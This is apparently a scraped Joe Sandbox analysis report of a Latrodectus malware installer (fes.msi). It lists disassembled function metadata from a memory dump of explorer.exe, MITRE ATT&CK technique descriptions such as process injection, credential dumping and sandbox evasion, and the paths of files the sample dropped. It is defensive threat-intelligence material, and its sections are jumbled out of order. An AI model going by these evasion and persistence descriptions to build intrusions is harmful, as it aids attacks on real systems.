%llu, xrefs: 0E627D71

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: Heap$AllocProcesssnprintf
String ID: %llu
API String ID: 2768945650-507646796
Opcode ID: fbe74492de0c58a96a336b2e78cdf3659ce7a75c0a75655281d28f762d5d2768
Instruction ID: ac1eea1c094b0fc03a9aaac9f3b01ca3db5f5369fdcb6dfdda474fb4421138d8
Opcode Fuzzy Hash: fbe74492de0c58a96a336b2e78cdf3659ce7a75c0a75655281d28f762d5d2768
Instruction Fuzzy Hash: C6F0E96171268553DF189B16FC183AC6391A789BD0F589539CD191BB98DD3DD8858700

Function 0E66D9DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 0E66DA11
_cwprintf_s_l.LIBCMT ref: 0E66DA27

Strings

%s.rowid, xrefs: 0E66DA20
%s.%s, xrefs: 0E66D9FB

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _cwprintf_s_l
String ID: %s.%s$%s.rowid
API String ID: 2941638530-1163076669
Opcode ID: 35d8670aebddcdc71436ee248236c59afeaaae9ad3be141e758003d3ad373560
Instruction ID: b3ee0317f7e58df76938881c162d953c008591ea31ca12508355ffe521b4d6ce
Opcode Fuzzy Hash: 35d8670aebddcdc71436ee248236c59afeaaae9ad3be141e758003d3ad373560
Instruction Fuzzy Hash: 39F0C222318A84C1DB20AF66F84039C6B61E3C6BD8F58452BDA5C2B364CB79C949C701

Function 0E623EF4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0E623FFD
std::_Xinvalid_argument.LIBCPMT ref: 0E62400A

Strings

string too long, xrefs: 0E623DBF, 0E623EE7, 0E623FF6, 0E624003
invalid string position, xrefs: 0E623EDA, 0E623FE9

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 909987262-4289949731
Opcode ID: 91f2818d95ab1f9aff1d62c32d5b15ab22eedf3d2ae2378a857255074f6e612a
Instruction ID: dd4c2fead785b0925ea5631cebec91782ebcdda4d4d040aa65657794ad9f83dc
Opcode Fuzzy Hash: 91f2818d95ab1f9aff1d62c32d5b15ab22eedf3d2ae2378a857255074f6e612a
Instruction Fuzzy Hash: 64E06560B10B5889E608EF42FC8439837A1B7A4F80F994828CB1D43B20CB39CDA0CB44

Function 0E623C14 Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0E623CA6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0E623CAC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0E623CB2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0E623CB8

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 8e43e90ad0944aaeca86e0ab888ea8ccf6e7122b7d4f9ab18fce5a6bba972209
Instruction ID: 25c680254e0445d05c12c2258f7a4b16e1a4e577f9cb9ae23e1c93afde1c7e76
Opcode Fuzzy Hash: 8e43e90ad0944aaeca86e0ab888ea8ccf6e7122b7d4f9ab18fce5a6bba972209
Instruction Fuzzy Hash: D941E221355EA682EF188A26FA4431C6362E709FD4F548D39CF5A0BB4CDB6CCC928B45

Function 0E626A94 Relevance: 6.0, APIs: 4, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0E626AD8
HeapReAlloc.KERNEL32 ref: 0E626AF2
wsprintfW.USER32 ref: 0E626B22

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: Heap$AllocProcesswsprintf
String ID:
API String ID: 659108358-0
Opcode ID: 1a5cbe290e6164308e760f08b1077ff65b42fb5fec338d9a0b660c1ab1545f37
Instruction ID: 8530598455e392b530a005521fba16a339a5b75460cced2aa5b1b17947fee60b
Opcode Fuzzy Hash: 1a5cbe290e6164308e760f08b1077ff65b42fb5fec338d9a0b660c1ab1545f37
Instruction Fuzzy Hash: B1115632204B9197D704CB2AF84435D3370F748B84F54443ADB4A97B24EF36E9A6CB40

Function 0E6B5AF0 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0E6B5AFA
SetLastError.KERNEL32 ref: 0E6B5B62
SetLastError.KERNEL32 ref: 0E6B5B78
abort.LIBCMT ref: 0E6B5B7E

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: ErrorLast$abort
String ID:
API String ID: 1447195878-0
Opcode ID: 30da044a8b31290615ad2a970db6bb58edfe8bdf98a4171a9d1c89323dabce22
Instruction ID: 35b11e90f3f67a57a13ef74f474917ff7504b9e3ac8ce03f7b75c1e451496170
Opcode Fuzzy Hash: 30da044a8b31290615ad2a970db6bb58edfe8bdf98a4171a9d1c89323dabce22
Instruction Fuzzy Hash: 44014B2430174046EB1D6B31B9683ED63939F95BD5F14092CD92B57B95FE29ECC68300

Function 0E6B6A04 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0E6B6A68

Strings

gfffffff, xrefs: 0E6B6CF6

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: gfffffff
API String ID: 3215553584-1523873471
Opcode ID: 520b82a36c0a7b9d249dd85874503ff5ac1e0feac7974ac1f6c09453a383f967
Instruction ID: 8d8edc9354f80b0fcbee5885290c01732bc93d6af07902648e31ceb03dc28145
Opcode Fuzzy Hash: 520b82a36c0a7b9d249dd85874503ff5ac1e0feac7974ac1f6c09453a383f967
Instruction Fuzzy Hash: 548145637163C986DB158F2AF1803ECBB65E766BD0F089121CF9907765EB38C996C301

Function 0E6ACD18 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0E6ACD4A
_invalid_parameter_noinfo.LIBCMT ref: 0E6ACF84

Strings

*, xrefs: 0E6ACE5A

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: *
API String ID: 3215553584-163128923
Opcode ID: fad42e489f23c5c2b1f1f78ebfa2d8998639f6a6390f6c80db9e78c1b0a84f1f
Instruction ID: 185a61887b7f00eef2d8d0a09b8c8f3806fee296d5fdc204d0c9a0ad38187359
Opcode Fuzzy Hash: fad42e489f23c5c2b1f1f78ebfa2d8998639f6a6390f6c80db9e78c1b0a84f1f
Instruction Fuzzy Hash: 4961D372A15660C6CB289F39E06427CBBB4F70AF48B5C221ADB0657358DB35CD82CF54

Function 0E6B6E34 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0E6B6E77

Strings

gfff, xrefs: 0E6B6FA2
e+000, xrefs: 0E6B6F1F

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: 476d8f94a21602e2858b7bffa39b26425147de9b952212b80d91de2b1b8549c3
Instruction ID: e615731634a5cc3a3beca317bb8144d23bc94e0593f9a2e6ce0bafcb062a314e
Opcode Fuzzy Hash: 476d8f94a21602e2858b7bffa39b26425147de9b952212b80d91de2b1b8549c3
Instruction Fuzzy Hash: EB4119627257C086D7258F39F85039D7B96E381B90F4CD625CBA88BBD9DB2CC885C700

Function 0E623A44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0E623B77
std::_Xinvalid_argument.LIBCPMT ref: 0E623B84

Strings

string too long, xrefs: 0E623B70, 0E623B7D

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: string too long
API String ID: 909987262-2556327735
Opcode ID: 638eed04e472bf6492dba83b0df2ea54084f24fa6f2fad4fd946a58b80a7aad9
Instruction ID: 234ea9991d1f29a97ec81ca5ed81940aa47c760721ca82dd81596497786a2320
Opcode Fuzzy Hash: 638eed04e472bf6492dba83b0df2ea54084f24fa6f2fad4fd946a58b80a7aad9
Instruction Fuzzy Hash: D831C462795EA685EF048F1AF5502186321E355FD0F884A39CE6E07BD8DB7DCC928B01

Function 0E62FC18 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 0E62FD42
__swprintf_l.LIBCMT ref: 0E62FD53

Strings

OsError 0x%lx (%lu), xrefs: 0E62FD3B

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: __swprintf_l
String ID: OsError 0x%lx (%lu)
API String ID: 1488884202-3720535092
Opcode ID: 2796b976d12cad71f742763eb2529de1659e39ba970a831c9b33c43750192292
Instruction ID: 2931a88ed1e11d881eeaba014b7c4222798c6cc98f3c42616585bed269057d75
Opcode Fuzzy Hash: 2796b976d12cad71f742763eb2529de1659e39ba970a831c9b33c43750192292
Instruction Fuzzy Hash: 0D316532715E9086DB619F26F85075AA3B0FBD9B90F48493DDE4DA7B64DF39C8408B40

Function 0E646ABC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 0E646B6D

Strings

%!.15g, xrefs: 0E646B61
, xrefs: 0E646B44

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _cwprintf_s_l
String ID: $%!.15g
API String ID: 2941638530-415585126
Opcode ID: eb33cb9144ee3cd1f4389dbaa626097b5f312b47766288748575db7650bf8f13
Instruction ID: d7b86f8210defd1ebb37455066cb18dc83e70e85b73d291a8efec075077c5e82
Opcode Fuzzy Hash: eb33cb9144ee3cd1f4389dbaa626097b5f312b47766288748575db7650bf8f13
Instruction Fuzzy Hash: 8C31E5B3118B80C6D7109F25F08432E77A0F752BA8F188615EB994B7D8D779C856CB10

Function 0E623CC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON

Download Yara Rule

Strings

string too long, xrefs: 0E623DBF, 0E623EE7, 0E623FF6, 0E624003
invalid string position, xrefs: 0E623EDA

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID:
String ID: invalid string position$string too long
API String ID: 0-4289949731
Opcode ID: 0fa423f91813095ada57ca02907b76f1699c6168422c04900660209f28485fb6
Instruction ID: 15fb197560971c876af32003683349d7be3f0be801e3fbb2a66c998d1458d904
Opcode Fuzzy Hash: 0fa423f91813095ada57ca02907b76f1699c6168422c04900660209f28485fb6
Instruction Fuzzy Hash: CE21F961395EA181EF148A26FE503185312E745FE4B544E3DCE3A07BDCDB2CCC924B41

Function 0E66ABD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 0E66AC1D

Strings

DELETE FROM %Q.%s WHERE %s=%Q, xrefs: 0E66AC49
sqlite_stat%d, xrefs: 0E66AC0C

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: __swprintf_l
String ID: DELETE FROM %Q.%s WHERE %s=%Q$sqlite_stat%d
API String ID: 1488884202-3667113883
Opcode ID: 6aa6f05ab88662c2bf4a7d8f77f366e5caf1c0e8dcbb76c59455029a57eda4b0
Instruction ID: 59d8faa6326cad138537d6befa986a4feddf356c78ee054cdc52e21ae9b3c68c
Opcode Fuzzy Hash: 6aa6f05ab88662c2bf4a7d8f77f366e5caf1c0e8dcbb76c59455029a57eda4b0
Instruction Fuzzy Hash: 81018776324B9482EB108F0AF4806897BA0F388FC8F49512AEF8C67B18CF39D511CB00

Function 0E623DCC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0E623EEE

Strings

string too long, xrefs: 0E623EE7
invalid string position, xrefs: 0E623ECD, 0E623EDA

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 909987262-4289949731
Opcode ID: 11ce337d544bd20418dd297afb6215f919e55a361865993419869e8f00413ec6
Instruction ID: 7b6b0dfd25e107a9936bd34d18bb491827f56358b3df4d3769a9e82c19088d40
Opcode Fuzzy Hash: 11ce337d544bd20418dd297afb6215f919e55a361865993419869e8f00413ec6
Instruction Fuzzy Hash: 9BE0DF20B14B8880D604DB42FC8430963A2BBB47C0F984C268B6D43F30CB3ACC90CB40

Function 0E6A4BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMONLIBRARYCODE

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 0E6A4BBD
_CxxThrowException.LIBVCRUNTIME ref: 0E6A4BCE

Part of subcall function 0E6A70C4: RtlPcToFileHeader.KERNEL32 ref: 0E6A7141
Part of subcall function 0E6A70C4: RaiseException.KERNEL32 ref: 0E6A7180

Strings

Unknown exception, xrefs: 0E6A4BD9

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
String ID: Unknown exception
API String ID: 3561508498-410509341
Opcode ID: 0e811aa1f1c87dae97651a08db0a869362024b74a6f64d5c2541639744d72e54
Instruction ID: c29c8da53ef4c2a89991c69af831756213a122de04a07d3964763b82be2873c8
Opcode Fuzzy Hash: 0e811aa1f1c87dae97651a08db0a869362024b74a6f64d5c2541639744d72e54
Instruction Fuzzy Hash: 3BD05223B10AC4D2CE10EB00FC80388A370F3A4348FE84816D28E835B0DF6ADE0ACB40

Function 0E626F6C Relevance: 5.0, APIs: 4, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0E626F87
HeapFree.KERNEL32 ref: 0E626F95
GetProcessHeap.KERNEL32 ref: 0E626FA0
HeapFree.KERNEL32 ref: 0E626FAE

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: b9f64374009a85716698715628642f07bcf485a8e23b64846cf13733ca946d4d
Instruction ID: b491229d2cf2dc4737ed98a80f1fb8b1e8aba02699f127ba9b368fc7c6f1c158
Opcode Fuzzy Hash: b9f64374009a85716698715628642f07bcf485a8e23b64846cf13733ca946d4d
Instruction Fuzzy Hash: AAE06D25601FC096EF18CBA6F91C329A362BB8DFD4F689524CE5A17B18EE39D4558700

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report fes.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Latrodectus

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\451511.rbs

C:\Users\user\AppData\Local\Temp\Iwdaeh.tmp

C:\Users\user\AppData\Local\Temp\Owcu.tmp

C:\Users\user\AppData\Local\Temp\Owcu.tmp-shm

C:\Users\user\AppData\Local\Temp\Tilu.tmp

C:\Users\user\AppData\Local\Temp\cauc.tmp

C:\Users\user\AppData\Local\Temp\weemec32.tmp

C:\Users\user\AppData\Roaming\avutil.dll

C:\Users\user\NTUSER.DAT.Not

C:\Windows\Installer\45150f.msi

C:\Windows\Installer\MSI15E9.tmp

C:\Windows\Installer\MSI1658.tmp

Windows Analysis Report
fes.msi

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
